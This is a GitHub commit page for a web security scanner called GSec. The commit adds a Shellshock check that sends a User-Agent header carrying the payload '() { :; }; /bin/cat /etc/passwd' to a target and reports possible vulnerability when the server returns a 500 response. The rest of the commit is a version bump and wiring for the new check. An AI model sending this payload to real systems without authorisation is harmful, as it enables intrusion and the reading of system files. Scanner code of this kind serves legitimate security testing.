Skip to content

Commit

Permalink
added shellshock vulnerability scanner
Browse files Browse the repository at this point in the history
  • Loading branch information
Miguel Sanchez authored and Miguel Sanchez committed Aug 15, 2022
1 parent 260c10c commit 6e1ad53
Show file tree
Hide file tree
Showing 3 changed files with 17 additions and 2 deletions.
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@ Web Security Scanner


,~,
((()- - GSec v0.9
((()- - GSec v0.10
-''-. - by c0deninja
(\ /\) - @gotr00t0day (Instagram)
~______\) | `\
Expand Down
13 changes: 13 additions & 0 deletions exploits/shellshock.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
from colorama import Fore
import requests

user_agent = "() { :; }; /bin/cat /etc/passwd"
header = {"User-Agent": user_agent}


def shellshock_scan(domain: str) -> str:
res = requests.get(domain, verify=False, headers=header)
if res.status_code == 500:
print(f"{Fore.MAGENTA}[+] {Fore.CYAN}-{Fore.WHITE} Shellshock: {Fore.GREEN}Might be vulnerable!")
else:
pass
4 changes: 3 additions & 1 deletion gsec.py
Original file line number Diff line number Diff line change
Expand Up @@ -3,6 +3,7 @@
from utils import portscanner, loginscanner, techscanner, cmsscanner, passive_recon
from plugins import phpcheck, optionscheck
from vuln_db import hostheader_injection, nuclei_vulns
from exploits import shellshock
import argparse
import subprocess
import os
Expand All @@ -23,7 +24,7 @@
{Fore.RESET}
,~,
((()- - GSec beta-v0.9
((()- - GSec beta-v0.10
-''-. - by c0deninja
(\ /\) - @gotr00t0day (Instagram)
~______\) | `\\
Expand Down Expand Up @@ -93,6 +94,7 @@ def commands(cmd):
techscanner.Tech(args.target)
nuclei_vulns.nuclei_nginx_scan(args.target)
nuclei_vulns.nuclei_cve_scan(args.target)
shellshock.shellshock_scan(args.target)
loginscanner.admin_list(args.target)
hostheader_injection.host_header_injection(args.target)
print("\n")
Expand Down

0 comments on commit 6e1ad53

Please sign in to comment.